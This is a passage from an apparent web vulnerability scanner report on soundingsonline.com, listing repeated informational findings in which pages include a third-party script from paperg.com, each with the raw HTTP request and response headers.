Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.15. http://www.soundingsonline.com/calendar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /calendar HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.16. http://www.soundingsonline.com/career-opportunities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /career-opportunities HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.17. http://www.soundingsonline.com/columns-blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /columns-blogs HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.18. http://www.soundingsonline.com/columns-blogs/bay-tripper  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /columns-blogs/bay-tripper HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.19. http://www.soundingsonline.com/columns-blogs/books  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /columns-blogs/books HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.20. http://www.soundingsonline.com/columns-blogs/new-england-fishing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /columns-blogs/new-england-fishing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.21. http://www.soundingsonline.com/columns-blogs/under-way  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /columns-blogs/under-way HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.22. http://www.soundingsonline.com/component/chronocontact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /component/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.23. http://www.soundingsonline.com/component/content/article/237622  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /component/content/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.24. http://www.soundingsonline.com/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.25. http://www.soundingsonline.com/features  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.26. http://www.soundingsonline.com/features/destinations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/destinations

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/destinations HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.27. http://www.soundingsonline.com/features/in-depth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/in-depth HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.28. http://www.soundingsonline.com/features/justyesterday  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/justyesterday HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.29. http://www.soundingsonline.com/features/lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/lifestyle HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.30. http://www.soundingsonline.com/features/profiles  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/profiles HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
